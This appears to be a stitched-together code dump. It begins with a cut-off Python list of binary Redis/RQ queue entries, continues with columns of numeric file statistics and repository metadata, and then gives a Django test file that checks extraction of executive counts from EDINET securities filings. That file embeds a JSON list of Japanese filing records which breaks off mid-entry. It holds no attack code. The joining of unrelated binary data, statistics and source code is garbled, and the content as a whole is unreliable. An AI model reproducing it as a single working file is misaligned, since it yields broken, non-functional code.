r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa0v\xb06\x8fb\x12\xf5'),
(b'rq:job:1b2b1887-d608-4662-86fa-560d7b575fd0', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.511490Z\nstarted_at\x1b2019-08-12T20:49:28.140359Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:28.142201Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.511732Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xc9*\xcb \xb6d\x11y'),
(b'rq:worker:2dba88aae2b54c90b87c74c89d458acc', 49, b'\r\xc3@\xca@\xec\x04\xec\x00\x00\x00\xce \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:28.1\x1624871Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f48542Z\x1d\x06queues\x08\x06medium\x08\x03pid\x05\xc095\x04\x1f\x08hostname\n\x08parabook\n\x05state\x07\x04idle\x1f\x06\x10failed_job_count\x12\xf2\x02\x12total_work\x14ing_time\x14\x080.001842\n\x05d \x8e\xe0\x0f\xbc\x0648931Z\xff\x08\x00.\x18\x1d^\x7f\xe0\x02\x83'),
(b'rq:failed:low', 0, b'\x0c@\x8f\x8f\x00\x00\x00\x88\x00\x00\x00\x06\x00\x00$acfa2647-5e40-4510-9e8c-303df1dbc757&\xd0\xf5\x033_\x06$1fbc9695-c0a7-4302-8a77-9304ca86057b&\xd0P\x043_\x06$91478a7d-9165-43b5-8f5a-f91a37a8feea&\xd0V\x043_\xff\x08\x00\xcbS\xd3\xebb\xbb\x9f\x8d'),
]
| 501.179104
| 1,441
| 0.761041
| 6,603
| 33,579
| 3.832197
| 0.081781
| 0.030944
| 0.048135
| 0.04932
| 0.926691
| 0.911595
| 0.890255
| 0.869112
| 0.861247
| 0.855794
| 0
| 0.282751
| 0.013639
| 33,579
| 66
| 1,442
| 508.772727
| 0.481235
| 0
| 0
| 0.333333
| 0
| 1.174603
| 0.830668
| 0.823521
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
10c81ce807c20fd328f0b631f35915ac7b4ae99b
| 254,647
|
py
|
Python
|
src/edinet/app/eagle/tests/test_edinet_feature_extractor.py
|
ryuichi1208/air-pipeline
|
eac5cad9f089e41ed5aace2fdaf0aff3696efb09
|
[
"Apache-2.0"
] | 5
|
2019-12-01T07:50:04.000Z
|
2021-06-01T02:04:22.000Z
|
airflow_ml/edinet_flow/app/eagle/tests/test_edinet_feature_extractor.py
|
icoxfog417/airflow-ml-exercises
|
9fc1072a38be7a014ba2ec1a955d96b87c03e104
|
[
"MIT"
] | 13
|
2019-12-04T23:09:46.000Z
|
2022-03-01T23:10:31.000Z
|
airflow_ml/edinet_flow/app/eagle/tests/test_edinet_feature_extractor.py
|
icoxfog417/airflow-ml-exercises
|
9fc1072a38be7a014ba2ec1a955d96b87c03e104
|
[
"MIT"
] | 2
|
2020-05-22T14:27:49.000Z
|
2020-10-09T03:20:50.000Z
|
import os
import shutil
import json
from django.test import TransactionTestCase
import edinet
from eagle.service import EDINETDocumentRegister
from eagle.service import EDINETFeatureExtractor
from eagle.models import NumberOfExecutives
class TestEDINETFeatureExtractor(TransactionTestCase):
    """Exercise EDINETFeatureExtractor against documents registered from EDINET.

    NOTE(review): ``setUpData`` downloads real XBRL/PDF files into
    ``DATA_DIR`` on first run, so this test appears to require network
    access — confirm before running in CI.
    """

    # Local cache directory for downloaded XBRL/PDF fixtures.
    DATA_DIR = os.path.join(os.path.dirname(__file__), "./data")

    def setUpData(self, document_types, count=-1):
        """Select documents from LISTS, fetch their files, and register them.

        Args:
            document_types: collection of ``doc_type_code`` values to keep
                (only documents with ``ordinance_code == "010"`` are used).
            count: maximum number of documents to register; -1 (default)
                means no limit.

        Returns:
            Tuple ``(targets, registered)``: the selected document objects
            and the corresponding results of ``register_document``.
        """
        # makedirs(exist_ok=True) replaces the original exists()/mkdir()
        # sequence, which had a check-then-create race.
        os.makedirs(self.DATA_DIR, exist_ok=True)

        document_list = json.loads(LISTS.strip())
        documents = edinet.models.Documents.create(document_list)
        targets = [d for d in documents.list
                   if d.doc_type_code in document_types
                   and d.ordinance_code == "010"]
        if count > 0:
            targets = targets[:count]

        service = EDINETDocumentRegister()
        registered = []
        for t in targets:
            xbrl = t.document_id + "_1.xbrl"
            pdf = t.document_id + "_2.pdf"
            xbrl_path = os.path.join(self.DATA_DIR, xbrl)
            pdf_path = os.path.join(self.DATA_DIR, pdf)
            print(t.document_id)  # progress marker; downloads can be slow
            # Fetch each artifact only when missing from the local cache;
            # pass an empty path when the document lacks that format.
            if not os.path.exists(xbrl_path):
                if t.has_xbrl:
                    t.get_xbrl(save_dir=self.DATA_DIR)
                else:
                    xbrl_path = ""
            if not os.path.exists(pdf_path):
                if t.has_pdf:
                    t.get_pdf(save_dir=self.DATA_DIR)
                else:
                    pdf_path = ""
            r = service.register_document(t, xbrl_path, pdf_path)
            registered.append(r)
        return targets, registered

    def test_extract_feature(self):
        """Extract number_of_executives from doc-type "120" documents."""
        targets, registered = self.setUpData(("120",))
        assert len(targets) > 0
        self.assertEqual(len(targets), len(registered))

        class StorageMock():
            # Stand-in for remote storage: "download" is a local file copy.
            def download_file(self, source, target):
                shutil.copyfile(source, target)

        service = EDINETFeatureExtractor(StorageMock())
        feature_name = "executive_state.number_of_executives"
        for d in registered:
            results = service.extract_feature(
                d, feature_name, dryrun=True)
            self.assertTrue(feature_name in results)
            self.assertTrue(
                isinstance(results[feature_name], NumberOfExecutives))
            self.assertGreater(results[feature_name].value, 0)
LISTS = """
{
"metadata":
{
"title": "提出された書類を把握するためのAPI",
"parameter":
{
"date": "2018-09-10",
"type": "2"
},
"resultset":
{
"count": 251
},
"processDateTime": "2019-06-21 00:09",
"status": "200",
"message": "OK"
},
"results": [
{
"seqNumber": 1,
"docID": "S100E1Y3",
"edinetCode": "E12448",
"secCode": null,
"JCN": "8010401040306",
"filerName": "明治安田アセットマネジメント株式会社",
"fundCode": "G10139",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:00",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 2,
"docID": "S100E2YB",
"edinetCode": "E25036",
"secCode": null,
"JCN": null,
"filerName": "馬渕 喬",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:00",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E01944",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1PB",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 3,
"docID": "S100E1EU",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05301",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "半期報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 4,
"docID": "S100E01G",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11833",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第29期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 5,
"docID": "S100E1Y5",
"edinetCode": "E12448",
"secCode": null,
"JCN": "8010401040306",
"filerName": "明治安田アセットマネジメント株式会社",
"fundCode": "G10386",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:00",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 6,
"docID": "S100E0GV",
"edinetCode": "E06748",
"secCode": null,
"JCN": "2010001049257",
"filerName": "大和証券投資信託委託株式会社",
"fundCode": "G12816",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-18",
"periodEnd": "2018-09-18",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "半期報告書(内国投資信託受益証券)-第1期(平成29年12月18日-平成30年9月18日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 7,
"docID": "S100E2S2",
"edinetCode": "E03196",
"secCode": "99420",
"JCN": "3320001001417",
"filerName": "株式会社ジョイフル",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "030000",
"docTypeCode": "120",
"periodStart": "2018-01-01",
"periodEnd": "2018-06-30",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "有価証券報告書-第44期(平成30年1月1日-平成30年6月30日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 8,
"docID": "S100DQ2W",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11931",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第4期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 9,
"docID": "S100E2S0",
"edinetCode": "E03196",
"secCode": "99420",
"JCN": "3320001001417",
"filerName": "株式会社ジョイフル",
"fundCode": null,
"ordinanceCode": "015",
"formCode": "010000",
"docTypeCode": "235",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "内部統制報告書-第44期(平成30年1月1日-平成30年6月30日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 10,
"docID": "S100E017",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11833",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 11,
"docID": "S100E1EQ",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05322",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:01",
"docDescription": "半期報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 12,
"docID": "S100E1J8",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G12523",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 13,
"docID": "S100E293",
"edinetCode": "E12434",
"secCode": null,
"JCN": "7010001031160",
"filerName": "損保ジャパン日本興亜アセットマネジメント株式会社",
"fundCode": "G04199",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 14,
"docID": "S100E2RY",
"edinetCode": "E03196",
"secCode": "99420",
"JCN": "3320001001417",
"filerName": "株式会社ジョイフル",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 15,
"docID": "S100E0GT",
"edinetCode": "E06748",
"secCode": null,
"JCN": "2010001049257",
"filerName": "大和証券投資信託委託株式会社",
"fundCode": "G12816",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:02",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100BVMG",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 16,
"docID": "S100D9BE",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11902",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:02",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第5期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 17,
"docID": "S100E0DK",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12670",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:02",
"docDescription": "半期報告書(内国投資信託受益証券)-第2期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 18,
"docID": "S100E297",
"edinetCode": "E12434",
"secCode": null,
"JCN": "7010001031160",
"filerName": "損保ジャパン日本興亜アセットマネジメント株式会社",
"fundCode": "G08431",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:02",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 19,
"docID": "S100E1KP",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05301",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CHWN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 20,
"docID": "S100E23A",
"edinetCode": "E06748",
"secCode": null,
"JCN": "2010001049257",
"filerName": "大和証券投資信託委託株式会社",
"fundCode": "G01878",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 21,
"docID": "S100DMDK",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11931",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 22,
"docID": "S100E060",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11902",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 23,
"docID": "S100E2NC",
"edinetCode": "E13000",
"secCode": null,
"JCN": "4010001069955",
"filerName": "フランクリン・テンプルトン・インベストメンツ株式会社",
"fundCode": "G08227",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-21",
"periodEnd": "2018-06-20",
"submitDateTime": "2018-09-10 09:03",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第15期(平成29年12月21日-平成30年6月20日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 24,
"docID": "S100E1DQ",
"edinetCode": "E12430",
"secCode": null,
"JCN": "8010401072159",
"filerName": "日興アセットマネジメント株式会社",
"fundCode": "G01725",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:04",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 25,
"docID": "S100E1J6",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G12523",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:04",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第1期(平成29年6月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 26,
"docID": "S100E0DL",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12670",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:04",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 27,
"docID": "S100E1KQ",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05322",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:04",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CHWO",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 28,
"docID": "S100DYLA",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11003",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:05",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第10期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 29,
"docID": "S100E1X8",
"edinetCode": "E08957",
"secCode": null,
"JCN": "4010401049128",
"filerName": "三井住友アセットマネジメント株式会社",
